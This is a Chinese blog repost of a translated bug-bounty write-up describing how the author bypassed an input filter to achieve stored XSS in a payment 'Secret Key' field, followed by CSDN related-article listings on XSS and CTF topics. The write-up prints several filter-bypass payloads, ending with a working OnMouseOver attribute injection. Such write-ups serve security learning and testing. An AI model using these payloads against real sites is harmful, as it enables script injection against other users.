一个存储型xss的bypass案例

最新推荐文章于 2024-05-29 14:49:51 发布
最新推荐文章于 2024-05-29 14:49:51 发布
阅读量2.1k 收藏 1
点赞数
分类专栏: Web渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39997829/article/details/88087890
版权

翻译:

原文地址:https://medium.com/bugbountywriteup/story-of-a-stored-xss-bypass-26e6659f807b

漏洞类型:存储型xss

作者:Prial Islam Khan

 

……

最近我在测试一个私人网站,在该网站中,用户可以添加他们的个人信息。我注意到一个名为Secret Key的输入,它允许用户处理付款并将交易信息存储到应用程序中。

所以我输入正常的xss的payload:

“><img src=x οnerrοr=prompt(document.domain)>

它被过滤了,页面的代码如下:

<input type="text" id="****" name="****" value="">&lt;img img" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

从这个页面代码我们能够看出来:

1、“和> 没有完全被过滤

2、危险标签被过滤了,比如<img>过滤后变成img img

 

所以我现在有两种可能的方法去执行javascript代码,第一种方法使用某种方法去绕过<的过滤,第二种方法是添加恶意的HTML属性去执行javascript文件。所以我尝试了很多种方法去绕过<,但是行不通。我现在打算去使用第二种方法(添加一个恶意的HTML标签),所以我输入了以下xss的payload

“ OnMouseOver=prompt(1)

页面回显如下:

<input type="text" id="****" name="****" value="" OnMouseOver=prompt&#40;" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

我可以去添加一个HTML属性,但是这个括号被完全过滤了,所以我继续输入以下payload:

“ OnMouseOver=prompt`1`

页面回显如下:

<input type="text" id="****" name="****" value="" OnMouseOver=prompt`1`" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

但是代码没有被执行,仔细看了一眼,这个payload执行的话只需要一个",完整payload如下:

“ OnMouseOver=”prompt`1`

页面回显如下:

<input type="text" id="ipn_secret_keygen" name="ipn_secret_keygen" value=""OnMouseOver="alert`1`" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

看起来很不错,现在我将我的鼠标指针移动到输入处,这个OnMouseOver事件执行了XSS成功弹窗

谢谢阅读,我希望有时间将会写更多的帖子

 

 

安全大哥
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS学习
qq_44657899的博客
09-28 938
文章目录XSS通关小游戏level1level2level3level4level5(过滤on、XSS通关小游戏 level1 源码 <?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 align=center>欢迎用户".$str."</h2>"; ?> <center><img src=level1.png></center> <?php
bypass功能介绍
sun007700的专栏
01-06 3321
bypass功能介绍_黄焖榴莲饭的博客-CSDN博客_bypass 硬件bypass原理介绍_weixin_33884611的博客-CSDN博客 Bypass实现的原理分析 上面简单说明了一下Bypass的控制方式,下面针对Bypass工作原理作一下简要的说明,主要从硬件和软件两个层面来分析。以研华的FWA-3140系列产品为研究对象。 硬件层面 在硬件层面上,要实现Bypass,主要使用的就是继电器。这些继电器主要连接两个Bypass网口的各个网口信号线上,下图以其中一根信号线来说明继电器在其..
存储XSS
最新发布
2401_84466361的博客
05-29 1034
什么是存储xss:提交恶意xss数据,存入数据库中,访问时触发。存储xss和反射xss区别:存储存入数据库中,可持续时间长,而反射持续时间短,仅对本次访问有影响,反射一般要配合社工。存储xss操作过程:嵌入到了web页面的恶意代码被存储到服务器上,例如你注册时候将用户昵称设置为XSS恶意代码,那么访问某些页面会显示用户名的时候就会触发恶意代码。存储xss可能出现的位置:可以插入数据的地方,比如用户注册,留言板,上传文件的文件名处,管理员可见的报错信息....同源策略。
Spark知识点总结
weixin_50528552的博客
03-11 870
Spark知识点总结
临时工说: 云原生数据库别整新名词,bypass ,不就是旁路吗
sql server的专栏
09-15 143
开头还是介绍一下群,如果感兴趣polardb ,mongodb ,mysql ,postgresql ,redis 等有问题,有需求都可以加群群内有各大数据库行业大咖,CTO,可以解决你的问题。加群请联系 liuaustin3 ,在新加的朋友会分到2群(共1300人左右 1 + 2 + 3 + 4) 3群即将突破 400 会关闭自由申请,新人会进4群当越来越活明白的时候,人性的理解要深刻,没有人应...
XSS从菜鸟到高手,你可能需要这些干货&技巧
MachineGunJoe666
06-03 2367
XSS 简介 XSS,全称Cross Site Scripting,即跨站脚本攻击,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据攻击代码的工作方式,XSS可以分为反射XSS存储XSS和DOMXSS。 反射 反射XSS是非持久化的,攻击者事先制作好攻击链接,需要
XSS漏洞05】XSS通关大挑战
Fighting_hawk的博客
02-25 3972
1. 通过测试语句执行情况、网页源码: 1. 判断大小于号是否过滤与转义; 2. 判断单双引号是否过滤与转义; 3. 判断关键字是否过滤与转义; 4. 判断大小写是否转化; 5. 判断语句闭合方式。 6. 额外地,可以分析是否存在其他注入点。 2. 根据判断结果,灵活构造语句与利用绕过规则。...
YXcms-含有存储XSS漏洞的源码包
03-17
YXcms是一个内容管理系统(CMS),它不幸地包含了存储跨站脚本(Stored XSS)的安全漏洞。存储XSSXSS攻击的一种类,这种漏洞通常发生在用户提交的数据被持久化存储在服务器上,并在后续请求中未经适当过滤或...
存储Xss成因及挖掘方法
02-21
存储Xss成因及挖掘方法
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
YXcms是一个常见的内容管理系统,但在这个特定的版本——"YXcms-含有存储XSS漏洞的源码包(1).zip"中,存在一个严重的安全问题:存储跨站脚本(Stored Cross-Site Scripting,简称存储XSS)漏洞。这种漏洞允许...
存储XSS灰盒测试-01
09-15
在进行存储XSS测试之前,我们需要搭建一个测试环境。我们可以使用PhpStudy搭建一个微社区程序——ROCBOSS,这是一个开源的PHP社区程序,具有基本的社区功能,如用户注册、登录、发表文章、留言评论等。 环境搭建...
DedeCMS 存储xss漏洞1
08-03
在本文中,我们将深入探讨一个特定的存储 XSS(跨站脚本)漏洞,该漏洞存在于DedeCMS 的会员功能组件 `shops_delivery.php` 中的 `des` 参数。 ### 漏洞概述 这个存储 XSS 漏洞允许攻击者通过注入恶意脚本到 `...
JQuery在XSS攻击中的表现
qq_44884577的博客
04-17 986
JQuery在XSS攻击中的表现
xss练习-prompt(1) to win
Ni9htMar3的博客
09-11 9611
链接地址: http://prompt.ml/0 规则1、成功执行prompt(1). 2、payload不需要用户交互 3、payload必须对下述浏览器有效: - Chrome(最新版) - Firefox(最新版) - IE10 及以上版本(或者IE10兼容模式)4、每个级别至少给出两种浏览器的答案 5、字符越少越好level 0function escape(input)
ctf入门(转载)
wxy201008的博客
08-28 2121
CTF入门指南(0基础) ctf入门指南 如何入门?如何组队? capture the flag 夺旗比赛 类: Web 密码学 pwn 程序的逻辑分析,漏洞利用windows、linux、小机等 misc 杂项,隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据 reverse 逆向windows、linux类 ppc 编程类的 国内外著名比赛 国外: 国内:xctf联赛 0ctf上海国...
xss跳转代码_XSS跨站脚本攻击-靶场writeup&总结
weixin_39963819的博客
11-21 542
XSS简介XSS(跨站脚本攻击)是指攻击者在网页中嵌入客户端脚本,通常是Javascript编写的恶意代码,当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将在用户的浏览器上被解析执行。XSS Education环境搭建docker search xss # 搜索docker镜像,找到xss education对应的image docker run -d -p {p}:80 {sha} # {...
白帽子之web漏洞--xss攻击
鼓浪屿岛与海的博客
12-04 471
本文仅供学习,不支持一切以不法利益为目的的商业攻击 一.xss攻击原理 xss 是“跨站脚本攻击”,是一种注入攻击,当web应用对用户输入过滤的不严格时,攻击者写入恶意的脚本(CSS,HTML,JavaScript)到网页中时,如果访问了含有恶意代码的页面,恶意脚本就会被浏览器解析执行导致用户被攻击 二.常见xss危害 cookie窃取,session劫持,钓鱼攻击,蠕虫,ddos等。 ...
BugKu Web WriteUp
AlexYoung28的博客
08-24 2199
Web 8 这道题的代码和前面的文件包含写的思路一样, 我们都是运用  php://input 写,来实现我们从文件中读出的数据和我们传入的数据一样。 我写的如下:  只要保证  $ac  的值 和我们写入文件  $fn 的值 一样即可, 我这里都写的是 123 细心 这道题刚开始看到主页之后,又看了源代码和抓了包,发现都没有什么特别的地方,所以,只有拿御剑扫描一下后台。 ...
xss-labs 通关笔记
Ewige的博客
06-30 468
靶场地址:传送门 概述: XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类: 1.反射性XSS; 反射XXS是一种非持久性的攻击,它指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的目的。这里插入的恶意代码并没有保存在目标网站,需要引诱用户点击一个链接到目标网站的恶意链接来实施攻击。 原文链接:ht
反射XSS存储XSS的区别
05-24
反射XSS存储XSS都是常见的Web攻击类,它们的区别在于攻击者注入恶意代码的方式和攻击的后果。 反射XSS是指攻击者通过构造特定的URL链接或提交包含恶意脚本的表单数据等方式,将恶意脚本注入到网站的响应中,从而使得用户在访问该链接或提交表单后,恶意脚本会被浏览器解析执行,达到攻击的目的。这种攻击方式通常只会影响到当前用户。 而存储XSS则是指攻击者将恶意脚本注入到网站的数据库或其他存储介质中,当用户访问包含恶意脚本的页面时,恶意脚本会被加载并执行,从而危害到所有访问该页面的用户。这种攻击方式通常会对网站的数据造成破坏或者窃取用户的敏感信息。 因此,反射XSS主要是针对单个用户的攻击,攻击效果比较有限,而存储XSS则是一种更为严重的攻击方式,可以对整个网站产生影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值